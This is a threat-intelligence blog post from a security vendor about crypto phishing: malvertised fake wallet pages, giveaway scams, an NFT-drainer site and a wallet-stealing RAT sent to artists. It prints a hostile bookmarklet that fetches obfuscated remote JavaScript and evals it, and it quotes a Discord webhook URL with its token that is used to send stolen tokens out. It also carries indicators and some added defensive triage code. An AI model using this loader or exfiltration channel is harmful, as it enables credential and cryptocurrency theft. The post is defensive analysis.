A Whirlwind Tour Of Crypto Phishing

Eliya Stein
Confiant
Mar 21, 2022

The post-pandemic world has seen cryptocurrencies and blockchain products in general catapult in valuation and adoption. “Web3”, “DeFi”, and “NFT” have become household terms and the sector is growing so fast that people and businesses are pouring in with dollar signs in their eyes and high hopes to get a piece of the pie. A massive land grab reminiscent of the dot com bubble is taking place with fortunes amassed in the blink of an eye and wiped out just as quickly due to extreme price volatility, regulatory frothiness, hacks, and scams.

Like sharks to chum, the malvertisers have long since arrived to play their role. In this blog post we will look at several chains that start with an ad and end with cryptocurrency theft, usually via phishing.

Hardware Wallets

When it comes to blockchain based assets like Bitcoin, Ethereum, and many others, a private key is used to sign transactions. The transactions are then broadcast onto the blockchain in order to send funds or interact with smart contracts. Managing private keys is hard, so this is typically done by wallet software. Most wallets, during the “setup” stage, will generate a deterministic “seed phrase” that users can use to back up their wallet: every private key the wallet controls can be re-derived from it. Seed phrases are a very helpful abstraction, because they consist of human readable words as opposed to gibberish. So let’s say that you have a wallet on your laptop, but the laptop gets damaged, lost, or stolen. If you have your seed phrase secure, you can restore your wallet on a new laptop and regain control of funds that would otherwise be lost.

A hardware wallet is a physical device that is used to secure crypto assets. It adds an extra layer of security by requiring the user to physically interact with the device in order to confirm transactions. This way, the wallet software alone cannot send funds or complete an interaction just by initializing a transaction. Of course, if the seed phrase for the hardware wallet were to get leaked, then the point is moot: whoever holds the phrase can restore the wallet elsewhere without ever touching the device.

Enter malvertisers…

These are search ads that target Ledger related keywords. (Ledger and Trezor are the two brands leading the hardware crypto wallet space.) Ledger Live is the companion software used to operate a Ledger hardware wallet.

These ads link to cloaked phishing pages that masquerade as Ledger Live and try to get victims to enter their seed phrase:

Ledger, of course, is well aware of phishing as an existential threat to its customers and does attempt to drive the point home that the seed phrase is sacred and there is no reason to ever reveal it, but still it remains the premier technique for thieves.

Giveaway Scams

Social media also reigns as a popular channel for attacks of a similar flavor. Creative threat actors are able to orchestrate marketing funnels that lure victims in a subtle manner and escalate towards a phishing payload.

Here’s a great example that starts with a sponsored Instagram story from an account that very believably looks like it belongs to Vitalik Buterin, the founder of Ethereum. Especially interesting is that the post being promoted appears technical (“account abstraction proposal”), which is very much aligned with the type of content that Vitalik is known to share.

A would-be victim might be surprised to see that Vitalik has an Instagram presence, and quickly click through to the profile, where they would see hundreds of thousands of followers.

At this point, one might follow the account and forget about it until a few days later when this familiar scheme appears in a story posted by Vitalik, and the rest is history.

Recently, we have seen a scam with a similar flavor, but much darker. Fake websites that claim to be raising crypto funds to provide Ukraine with war relief:

ukrainethereum\.com

For >90% of the crypto phishing pages that we see, the mechanics are nearly identical and low tech: Emulate the target brand, ask the victim to connect their wallet, and prompt for the seed phrase:

But somewhat surprisingly, this is often haphazardly done:

The funny thing is that this type of incompetence is splashing around all over the place when it comes to Web3 phishing. Take for example this website that we recently saw go live:

Visually, it’s a nicely done fake of the registration page for the “Gangster All Star” NFT project found here -> https://register.gangsterallstar.com/, but unfortunately for the folks behind the scheme, it doesn’t even work due to CORS issues with the implementation.

Despite the fact that the malicious site appears to be broken (or perhaps still under construction), we do see a clever attempt to host the malicious JavaScript on a Discord owned domain:

javascript:fetch(/*xmarksthespot.*/atob(/*Whitelist.*/'aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTM1MTA4MzQ4MzYwMTM0NjY2Lzk1MTkxMDEzMDY5NjQ3ODg4MC94Lmpz')).then(leaving => leaving.text()).then(successfully => eval(successfully))

cdn.discordapp.com is the home of media uploads on Discord.

At this time a full analysis of x.js is beyond the scope of this post, but we were able to dump some strings during a preliminary analysis:

{
"tCaTr": "You must be logged in to be verified!",
"VLIfL": "not discord",
"zjtSw": "httVz",
"PYpUd": "hilBt",
"RDOhl": "hUhwI",
"YFxdN": "QZveY",
"pGiOE": "fLEax",
"WzyaG": "bMors",
"nnmVT": "HjhYS",
"xdZiY": "(((.+)+)+)+$",
"eorVo": "return (function() ",
"SmSId": "{}.constructor(\"return this\")( )",
"hSOfp": "RXkIJ",
"JfwQW": "POST",
"fFjJA": "application/json",
"uTPKN": "lpGeS",
"GTCOa": "ZAHvL",
"TgnuJ": "htPPV",
"QVwzX": "NLjuq",
"YDyKm": "nHpUC",
"LZtzQ": "bBGYi",
"uLHAM": "oxqpQ",
"noJTY": "AVAFo",
"XTkiZ": "kSGHS",
"eWKtO": "TIOyk",
"OMtYB": "log",
"FNpyg": "warn",
"BLjkX": "info",
"LmRQM": "error",
"fiVSQ": "exception",
"tbiTg": "table",
"wFORl": "trace",
"WpDWO": "ZfGRe",
"epmIH": "mROhB",
"qrJNY": "sXEBm",
"uXpno": "https://discord.com/api/v9/users/@me",
"XjzYq": "NbFEb",
"kZSAk": "cakNw",
"SEkWt": "YkYRW",
"bkSGs": "SyUyv",
"eEJEC": "User",
"UsUtV": ":e_mail: Email",
"nppIo": "Not Verified",
"YKPbw": ":mobile_phone: Phone",
"rwYHh": "Token",
"dLGGN": "Login script",
"cWskP": "beforeunload",
"oKqpj": "https://discord.com/api/webhooks/951908349677568091/4N7ccrI6NWBsD-Gw7BIs3MTyYm037ixS1iJvzwiQESe1z_gE6Se6j5JPMmQArspuJ4dF",
"DckyP": "discord.com",
"DcpUu": "iframe",
"klTDd": "display:none",
"ltDUi": "load"
}

A closer look at that webhook link potentially reveals the true intentions behind this phishing page:

$ curl https://discord.com/api/webhooks/951908349677568091/4N7ccrI6NWBsD-Gw7BIs3MTyYm037ixS1iJvzwiQESe1z_gE6Se6j5JPMmQArspuJ4dF | jq .
{
"type": 1,
"id": "951908349677568091",
"name": "Spidey Bot",
"avatar": null,
"channel_id": "951907890422222938",
"guild_id": "927995455508447242",
"application_id": null,
"token": "4N7ccrI6NWBsD-Gw7BIs3MTyYm037ixS1iJvzwiQESe1z_gE6Se6j5JPMmQArspuJ4dF"
}
The “Spidey Bot” name matches a previously reported Discord credential stealer:

https://www.tomsguide.com/news/discord-spidey-bot-malware-is-stealing-usernames-passwords
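To triage a snippet like the bookmarklet above, and a strings dump like the one that exposed the webhook, here is an added helper (not code from the original post or from the phishing site) for Node.js that strips the inline comments, decodes any base64 literal handed to atob(), flags the fetch → text() → eval() load-and-execute shape, and pulls Discord webhook ids and tokens out of text so they can be reported. The sample bookmarklet is copied from the post; the sample strings line uses a placeholder webhook id and token.

```javascript
// Added triage helper, not code from the post or the phishing site. Node.js built-ins only.

// Drop the /* ... */ comments that obfuscators wedge between tokens, e.g. atob(/*Whitelist.*/'...').
function stripBlockComments(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, '');
}

// Decode every base64 literal passed to atob() and report the host it points at.
function decodeAtobLiterals(src) {
  const found = [];
  for (const m of stripBlockComments(src).matchAll(/atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)/g)) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    let host = null;
    try { host = new URL(decoded).host; } catch (_) { /* decoded payload is not a URL */ }
    found.push({ decoded, host });
  }
  return found;
}

// The remote load-and-execute shape used by the bookmarklet: fetch(...) -> .text() -> eval(...).
function usesFetchThenEval(src) {
  const s = stripBlockComments(src);
  return /\bfetch\s*\(/.test(s) && /\.text\s*\(\s*\)/.test(s) && /\beval\s*\(/.test(s);
}

// A Discord webhook URL embeds the id and token that identify the exfiltration channel.
function extractWebhooks(text) {
  const re = /https:\/\/(?:discord|discordapp)\.com\/api\/webhooks\/(\d+)\/([\w-]+)/g;
  return [...text.matchAll(re)].map(m => ({ url: m[0], id: m[1], token: m[2] }));
}

function triage(src) {
  return { atob: decodeAtobLiterals(src), fetchThenEval: usesFetchThenEval(src), webhooks: extractWebhooks(src) };
}

// Constructed sample: the bookmarklet exactly as shown in the post.
const SAMPLE_BOOKMARKLET = "javascript:fetch(/*xmarksthespot.*/atob(/*Whitelist.*/'aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTM1MTA4MzQ4MzYwMTM0NjY2Lzk1MTkxMDEzMDY5NjQ3ODg4MC94Lmpz')).then(leaving => leaving.text()).then(successfully => eval(successfully))";
// Constructed strings-dump line with a placeholder webhook id/token (not the real one from the post).
const SAMPLE_STRINGS = '"oKqpj": "https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN",';

console.log(JSON.stringify(triage(SAMPLE_BOOKMARKLET), null, 2));
console.log(extractWebhooks(SAMPLE_STRINGS));
```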

But not all Web3 scams are blunders — some combine clever technical implementation with good timing in order to rapidly wreak havoc. One of these attacks went live on 03/20/2022 and began with widespread Twitter spam originating from seemingly verified accounts:

Victims are offered the promise of a very highly coveted token in exchange for 0.33 ETH:

ape-coin\.net

If we look at the code under the hood, we are met with a pretty well thought out scheme, but only after some really hateful/nasty comments ironically directed towards would-be plagiarists of the attackers’ code:

After victims connect their wallet, the site posts the address to its own backend API in order to check the victim’s balance and whether or not they own NFTs:

Once the relevant details are gathered, victims are tricked into authorizing transactions that send their valuable NFTs and/or the 0.33 ETH to claim the Ape Coin directly to the attacker. Here’s the code that does it.
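The screenshot of the site's code is not reproduced here. In its place, as an added defender-side example (not the attacker's code and not any wallet's actual implementation), here is a small pre-signing check for Node.js that decodes the standard ERC-721 transfer and approval selectors and warns when a request would pay ETH or move NFTs to an address other than the signer's; it also covers the approval paths (approve, setApprovalForAll), which the post does not single out. The addresses, token id and calldata are constructed sample values.

```javascript
// Added example, not the ape-coin site's code. Decodes an eth_sendTransaction-style request
// { to, value, data } and explains, in plain words, what signing it would authorize.
const SELECTORS = {                                    // standard ERC-721 4-byte selectors
  '0x23b872dd': 'transferFrom(address,address,uint256)',
  '0x42842e0e': 'safeTransferFrom(address,address,uint256)',
  '0xa22cb465': 'setApprovalForAll(address,bool)',
  '0x095ea7b3': 'approve(address,uint256)',
};
const WEI_PER_ETH = 10n ** 18n;

// i-th 32-byte ABI word of the calldata, skipping "0x" and the 4-byte selector.
const word = (data, i) => data.slice(10 + i * 64, 10 + (i + 1) * 64);
const asAddress = (w) => ('0x' + w.slice(24)).toLowerCase();
const asUint = (w) => BigInt('0x' + w);
const formatEth = (wei) => {
  const frac = (wei % WEI_PER_ETH).toString().padStart(18, '0').replace(/0+$/, '');
  return `${wei / WEI_PER_ETH}${frac ? '.' + frac : ''}`;
};

// Return the warnings a user should see before signing; an empty list means nothing leaves the signer.
function explainTx(tx, signer) {
  const me = signer.toLowerCase();
  const warnings = [];
  const value = BigInt(tx.value || '0x0');
  if (value > 0n) warnings.push(`sends ${formatEth(value)} ETH to ${tx.to}`);
  const data = (tx.data || '0x').toLowerCase();
  const fn = SELECTORS[data.slice(0, 10)] || null;
  if (fn === 'transferFrom(address,address,uint256)' || fn === 'safeTransferFrom(address,address,uint256)') {
    const to = asAddress(word(data, 1));
    if (to !== me) warnings.push(`moves NFT #${asUint(word(data, 2))} in ${tx.to} to ${to}`);
  } else if (fn === 'setApprovalForAll(address,bool)') {
    const operator = asAddress(word(data, 0));
    if (asUint(word(data, 1)) === 1n && operator !== me) warnings.push(`lets ${operator} move every NFT you hold in ${tx.to}`);
  } else if (fn === 'approve(address,uint256)') {
    const spender = asAddress(word(data, 0));
    if (spender !== me) warnings.push(`lets ${spender} move NFT #${asUint(word(data, 1))} in ${tx.to}`);
  }
  return { fn, warnings };
}

// Build sample calldata: selector followed by 32-byte left-padded words.
const encode = (sel, ...args) => sel + args.map(a => BigInt(a).toString(16).padStart(64, '0')).join('');

const VICTIM = '0x1111111111111111111111111111111111111111';  // constructed signer address
const THIEF = '0x2222222222222222222222222222222222222222';   // constructed attacker address
const NFT = '0x3333333333333333333333333333333333333333';     // constructed NFT contract
// Constructed request shaped like the post's description: 0.33 ETH plus an NFT transfer away from the signer.
const SAMPLE_TX = { to: NFT, value: '0x' + (330000000000000000n).toString(16), data: encode('0x23b872dd', VICTIM, THIEF, 42) };

console.log(explainTx(SAMPLE_TX, VICTIM));
```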

Stolen NFTs are then sold off on OpenSea. We can see just how lucrative this scheme has been by watching the address on Etherscan:

0xed4f4f461de76264299429909cfb102283b47310

As the phishing attack continues, the bad actors behind the site rotate their address, so the $136k stolen so far only represents a portion of the final haul.

Of course, not all phishing attacks are ad-powered either; some are hyper-targeted.

Jorge Ledezma, a generative artist working with NFTs shared this experience with us:

This is a common scenario where scammers will approach artists who they know to be involved with crypto and ask for a commissioned work. They will then send an archive of “reference photos” which unpacks to malware.

In this case:

Exact_sizes_to_order_from_the_artist.rar

Which unpacks to a Windows executable that is very poorly disguised as a PDF:

Exact sizes to order from the artist_document.pdf.pif

VirusTotal gives us a clue:

https://www.virustotal.com/gui/file/581b56dea8f59f59e14d10c1d417e94d6432901494fd9fa315a7fe53c0f13f26/details

While a comprehensive analysis of this malware is outside of the scope of this post, a cursory overview provided by Taha Karim shows us that this is indeed a RAT with C2 in Seychelles.

More info @ AlienVault:

https://otx.alienvault.com/indicator/ip/185.215.113.15

On launch, this piece of malware scans the victim’s drive for .txt files that contain the keywords ‘key’, ‘wallet’, and ‘seed’ in the filename or body and posts those back home to the C2.

Opsec Reminder: Please don’t store your private keys in text files on your device.

Impact & Scope

Over the course of any given week, we will detect several hundred newly active Web3 phishing domains and/or campaigns in addition to those targeting specific Web3 brands that we monitor.

If we look at the prevalence of these types of campaigns by target and type, we see some of the following statistics:

  • Approximately 1 in 5 Web3 phishing attacks that are promoted via malvertising are giveaway scams.
  • 30% of all scams that we have detected in the last 7 days somehow abuse or piggyback off of the Coinbase brand.
  • 1/4 of all Web3 phishing campaigns are seed phrase / fake wallet campaigns.
  • Of those, 20% target the Ledger brand explicitly.
  • The Axie Infinity brand is one of the hotter targets with 10 new IOCs per day on average in recent weeks.

IOCs
